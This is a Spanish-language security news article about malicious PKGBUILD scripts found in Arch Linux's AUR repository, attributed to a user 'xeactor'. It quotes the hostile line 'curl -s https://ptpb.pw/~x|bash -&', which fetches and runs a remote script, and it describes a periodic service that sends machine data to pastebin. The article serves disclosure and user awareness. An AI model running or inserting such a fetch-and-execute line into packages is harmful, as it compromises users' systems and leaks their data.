Se han hallado varios
scripts maliciosos en el repositorio AUR de la distribución Arch Linux.
Arch Linux es una
distribución Linux para, en general, usuarios avanzados, sin añadidos
(bloatware) y con un modelo de publicación basado en "rolling
release" (publicación continua de las versiones más recientes de los
paquetes).
Debido a la celeridad
en la producción y demanda de paquetes actualizados, la comunidad creó el
sistema AUR (Arch User's Repository) para que fuesen los propios usuarios los
que subieran los scripts PKGBUILD. Estos scripts permiten adaptar la
compilación e instalación de cualquier código fuente a Arch.
Los tres scripts
hallados, con contenido malicioso, son :
·
acrored
9.5.5-8
·
balz
1.20-3
·
minergate
8.1-2
Centrándonos en el
script correspondiente a 'acroread', vemos el contenido cambiado por el usuario
denominado 'xeactor':
La línea "curl
-s https://ptpb.pw/~x|bash -&" descarga un shell script con curl y
seguidamente lo ejecuta. En el momento de escribir estas líneas aun estaba
disponible en el servidor, el contenido (por si acaso) era el siguiente:
Instala un servicio
que ejecuta cada cierto tiempo el script instalado en '/usr/lib/xeactor/u.sh'.
Dicho script, a su vez, es descargado del mismo servidor (también disponible
cuando esto fue escrito) desde 'https://ptpb.pw/~u' y contenía el siguiente
código:
Básicamente,
recolecta información de la máquina "infectada" y la envía a
pastebin. En efecto, la parte que se ve en rojo es su propia clave privada de
pastebin. De hecho ya hay gente que la habría usado para mofarse del creador de
este "malware":
Otros usuarios han
comentado en Reddit que "xeactor" podría estar preparando esta
infección para minar, debido al historial de ese apodo relacionado con dicha
tecnología:
Y en efecto, aunque
es una afirmación atrevida, tirando de caché de Google sí se observa dicha
relación (reitero, esto no probaría que esa fuese su intención final, pero abre
esa posibilidad):
Respecto al sitio
donde cuelgan los scripts, https://ptpb.pw/, es un gestor de
"pastes", del estilo del glorioso 'pastebin' y similares así como
acortador de URLs, por lo que es posible que los scripts hayan sido,
simplemente, subidos a esa plataforma sin relación alguna con el atacante.
Más información:
·
Hilo
de la conversación en la lista de 'aur-general': https://lists.archlinux.org/pipermail/aur-general/2018-July/thread.html#34151
·
Hilo
de Reddit Arch Linux: https://www.reddit.com/r/archlinux/comments/8x0p5z/reminder_to_always_read_your_pkgbuilds/
Fuente: Hispasec